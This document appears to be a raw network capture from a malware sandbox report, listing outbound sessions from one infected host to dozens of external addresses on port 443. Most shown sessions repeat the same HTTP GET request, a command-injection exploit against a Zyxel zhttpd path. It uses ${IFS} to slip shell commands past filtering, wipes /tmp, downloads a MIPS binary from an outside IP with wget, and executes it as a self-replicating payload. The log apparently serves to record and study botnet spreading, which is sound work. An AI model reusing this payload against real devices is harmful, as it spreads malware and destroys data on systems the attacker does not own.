                                        Mar 31, 2024 09:23:04.045536995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9943192.168.2.236003417.163.76.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:04.045578957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9944192.168.2.2358694145.55.86.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:04.045629025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9945192.168.2.2334332181.122.222.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:04.045871019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9946192.168.2.2357162107.252.114.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:04.045927048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9947192.168.2.2355132201.51.178.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057502031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9948192.168.2.2356244170.246.163.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057548046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9949192.168.2.233838280.162.10.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057612896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9950192.168.2.2335404181.9.18.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057656050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9951192.168.2.2356048219.139.44.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057693958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9952192.168.2.2337730220.207.2.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057751894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9953192.168.2.2342716180.126.142.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057794094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9954192.168.2.2352426176.104.246.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057843924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9955192.168.2.234102874.106.173.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057883978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9956192.168.2.234006879.118.80.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057928085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9957192.168.2.2337774156.180.5.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.057972908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9958192.168.2.235670861.127.231.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058002949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9959192.168.2.2342148209.21.222.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058082104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9960192.168.2.2346628218.208.171.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058119059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9961192.168.2.233429475.222.18.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058163881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9962192.168.2.2349852199.8.101.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058202028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9963192.168.2.2350342141.72.25.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058259010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9964192.168.2.234369861.8.215.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058300972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9965192.168.2.2352018140.121.43.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058352947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9966192.168.2.23443164.28.196.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058382034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9967192.168.2.234537440.193.112.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058418989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9968192.168.2.235923860.183.248.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058479071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9969192.168.2.233809074.35.93.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058516026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9970192.168.2.2349088136.217.201.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058558941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9971192.168.2.2353584190.133.227.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058600903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9972192.168.2.2354596199.26.133.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058650017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9973192.168.2.235238440.146.154.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058695078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9974192.168.2.2335230143.129.152.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058742046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9975192.168.2.2345088193.127.239.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058780909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9976192.168.2.235186297.184.163.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058840036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9977192.168.2.235215485.233.72.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058883905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9978192.168.2.234621660.202.3.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058922052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9979192.168.2.2355370102.87.131.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.058968067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9980192.168.2.2335622138.106.32.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.059011936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9981192.168.2.234237865.31.227.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.059060097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9982192.168.2.234249494.82.11.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.059096098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9983192.168.2.2350836124.77.84.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.059143066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9984192.168.2.2347120124.193.90.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.059176922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9985192.168.2.2349752118.42.184.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:05.059211969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9986192.168.2.2356340106.198.212.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9987192.168.2.2334398106.233.238.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9988192.168.2.2348312141.211.50.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9989192.168.2.23577548.77.239.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9990192.168.2.2333384138.211.251.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9991192.168.2.2349464167.188.219.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9992192.168.2.2360390126.178.166.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9993192.168.2.234147020.248.87.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9994192.168.2.2357142139.220.208.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9995192.168.2.235580483.38.102.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9996192.168.2.2347658106.200.221.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9997192.168.2.23466028.227.173.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9998192.168.2.235605618.165.142.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9999192.168.2.2356314126.143.218.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10000192.168.2.235149620.43.186.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10001192.168.2.23352465.205.163.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10002192.168.2.234764879.134.143.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10003192.168.2.236093892.63.96.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10004192.168.2.234221837.105.135.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10005192.168.2.2333392186.177.64.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10006192.168.2.2344324162.174.184.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10007192.168.2.2350676122.106.136.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10008192.168.2.2342932206.126.218.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10009192.168.2.23561942.60.242.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10010192.168.2.2358338164.40.10.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10011192.168.2.2347552207.44.212.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10012192.168.2.235450052.142.223.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10013192.168.2.234770838.201.19.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10014192.168.2.2344224165.60.40.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10015192.168.2.2356980178.175.31.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10016192.168.2.2338826222.75.121.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10017192.168.2.2333068189.80.203.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10018192.168.2.2351968169.239.6.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10019192.168.2.2341450157.28.253.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10020192.168.2.2347096195.98.201.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10021192.168.2.2356648207.32.22.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10022192.168.2.234741273.140.172.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10023192.168.2.235038292.194.182.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10024192.168.2.2354504201.90.122.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10025192.168.2.233970660.116.69.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10026192.168.2.2338132143.189.93.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10027192.168.2.2348514126.96.158.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10028192.168.2.2336640185.41.30.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10029192.168.2.2336050192.76.246.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10030192.168.2.234406269.193.158.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10031192.168.2.235717242.1.173.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10032192.168.2.2339076120.165.36.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10033192.168.2.2357290138.237.25.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10034192.168.2.2341830211.227.53.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10035192.168.2.2335886135.133.59.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10036192.168.2.235553660.132.133.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10037192.168.2.2344358186.222.168.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10038192.168.2.233422027.27.74.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10039192.168.2.2359048111.36.117.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10040192.168.2.233899663.20.111.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10041192.168.2.2335438204.221.228.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10042192.168.2.2354522220.105.137.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10043192.168.2.233908631.108.239.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10044192.168.2.2353154115.104.190.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10045192.168.2.2355742191.216.1.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10046192.168.2.233643470.246.255.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10047192.168.2.2359000103.107.87.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10048192.168.2.23548908.4.23.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10049192.168.2.233365078.20.68.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10050192.168.2.2355996189.166.190.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10051192.168.2.2358734131.30.94.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10052192.168.2.23579141.75.48.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10053192.168.2.234449461.97.24.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10054192.168.2.2348328129.53.155.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10055192.168.2.2338676222.88.254.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10056192.168.2.2351200183.182.33.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10057192.168.2.234748690.13.235.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10058192.168.2.233845839.15.45.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10059192.168.2.2333664169.236.191.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10060192.168.2.234492819.42.192.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10061192.168.2.2355406203.221.226.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10062192.168.2.234482281.121.215.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10063192.168.2.2342714160.244.161.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10064192.168.2.2360704212.40.218.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10065192.168.2.2346684222.2.127.239443
